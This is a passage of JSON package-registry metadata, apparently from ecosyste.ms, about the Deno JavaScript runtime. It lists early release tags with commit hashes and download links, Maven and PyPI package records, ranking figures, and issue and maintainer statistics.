//repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T17:32:47.659Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.64704261927198,"dependent_packages_count":42.38355423497933,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.01529842712566},"purl":"pkg:maven/org.mvnpm/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm:deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm:deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm:deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-08T15:20:51.828Z","issues_count":6662,"pull_requests_count":9678,"avg_time_to_close_issue":17121605.73139413,"avg_time_to_close_pull_request":1530875.9301115242,"issues_closed_count":3814,"pull_requests_closed_count":8069,"pull_request_authors_count":594,"issue_authors_count":2496,"avg_comments_per_issue":2.5022515761032724,"avg_comments_per_pull_request":0.7209134118619549,"merged_pull_requests_count":7045,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":682,"past_year_pull_requests_count":1198,"past_year_avg_time_to_close_issue":1327952.9787234042,"past_year_avg_time_to_close_pull_request":1317968.8908554572,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":678,"past_year_pull_request_authors_count":194,"past_year_issue_authors_count":379,"past_year_avg_comments_per_issue":1.2272727272727273,"past_year_avg_comments_per_pull_request":1.1327212020033388,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":509,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1808,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":925,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":401,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:deno/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":622178,"maintainers_count":0,"namespaces_count":82612,"keywords_count":37065,"github":"maven-central","metadata":{"funded_packages_count":49047,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-08T05:02:10.551Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":2692928,"name":"deno","ecosystem":"pypi","description":"Python redistribution of Deno binaries","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":46,"first_release_published_at":"2019-08-22T23:02:22.000Z","latest_release_published_at":"2026-08-27T17:31:43.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T23:52:46.514Z","created_at":"2022-04-10T10:35:00.682Z","updated_at":"2026-09-08T17:32:47.669Z","registry_url":"https://pypi.org/project/deno/","install_command":"pip install deno --index-url https://pypi.org/simple","documentation_url":"https://deno.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":[],"normalized_name":"deno","project_status":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and 